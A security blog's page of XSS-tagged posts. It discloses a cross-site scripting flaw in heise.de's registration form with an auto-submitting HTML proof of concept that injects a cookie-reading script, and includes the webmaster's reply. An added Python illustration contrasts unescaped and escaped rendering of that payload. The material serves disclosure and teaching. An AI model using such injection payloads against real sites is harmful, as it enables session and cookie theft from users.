morph3us.org

Entries tagged as xss

How-to fake heise news entries

  (Tuesday, September 5. 2006)
As I already mentioned in a previous blog posting titled XSS on heise.de, there was an XSS vulnerability on heise.de. I informed heise's webmaster about this bug on December 23, 2005 and received a reply stating that the issue was addressed on January 06, 2006. It's almost unbelievable that this bug is still present to this day.


XSS on heise.de

  (Tuesday, January 3. 2006)
heise.de - a German news site for, amongst others, security related topics - is vulnerable to XSS (Cross Site Scripting). I contacted the webmaster of heise.de about this on December 23 but did not receive an answer, and the XSS vulnerability is still not addressed.

PoC:
<form method="post" action="http://www.heise.de/registration/" name="heise">
  <input type="text" name="uid" size="20" value=''>
  <input type="text" name="vorname" size="20" value='"><script>alert(document.cookie)</script>'>
  <input type="text" name="name" size="20" value='"><script>alert(document.cookie)</script>'>
</form>
<body onload="heise.submit();">

heise-xss-poc.txt

UPDATE: 2006-01-09: 20:26
Hello Mr. Waldegger,

Thank you for your notice. Because of the holidays, fixing it unfortunately took a little longer.

Kind regards
heise online
Webmaster
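As an added illustration (not part of the original post or of heise.de's code), the following Python renders the three registration fields from the PoC above once without encoding and once with HTML attribute encoding, then counts how many script elements a browser would actually parse. The field names come from the PoC; the two render functions are an assumed stand-in for the server-side template.

```python
import html

# Field names taken from the PoC form above. The two render functions are a
# constructed stand-in for the server-side template, not heise.de's own code.
FIELDS = ("uid", "vorname", "name")

# Constructed POST body carrying the PoC's attribute-breakout payload.
POC_PARAMS = {
    "uid": "",
    "vorname": '"><script>alert(document.cookie)</script>',
    "name": '"><script>alert(document.cookie)</script>',
}

def render_naive(params):
    """Reflect submitted values into value="..." without encoding (the bug)."""
    return "\n".join(
        f'<input type="text" name="{f}" size="20" value="{params.get(f, "")}">'
        for f in FIELDS
    )

def render_safe(params):
    """Same template, but every reflected value is HTML-attribute-encoded."""
    return "\n".join(
        f'<input type="text" name="{f}" size="20" '
        f'value="{html.escape(params.get(f, ""), quote=True)}">'
        for f in FIELDS
    )

def count_live_script_tags(markup):
    """Count <script start tags a browser would parse as real elements.

    Minimal tokenizer: a '<' inside a quoted attribute value cannot open a
    tag, so it is skipped; a '<' in text content starts a tag.
    """
    count, in_tag, quote = 0, False, None
    for i, c in enumerate(markup):
        if quote:                       # inside a "..." or '...' attribute value
            if c == quote:
                quote = None
        elif in_tag:                    # between '<' and '>' of a tag
            if c in ('"', "'"):
                quote = c
            elif c == ">":
                in_tag = False
        elif c == "<":                  # text content: a tag begins here
            if markup[i:i + 7].lower() == "<script":
                count += 1
            in_tag = True
    return count
```

The naive rendering yields two live script elements (one per injected field); the encoded rendering yields none, because the payload's `"` and `<` are emitted as `&quot;` and `&lt;` and never leave the attribute value.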

Links about Web Application Security

  (Friday, November 11. 2005)
A while ago I uploaded an XHTML document containing several viable resources about Web Application Security from my bookmarks. I think most links will be useful for people who are interested in web application security related topics.

Have a look.

http://morph3us.org/security/links/web-app-security.html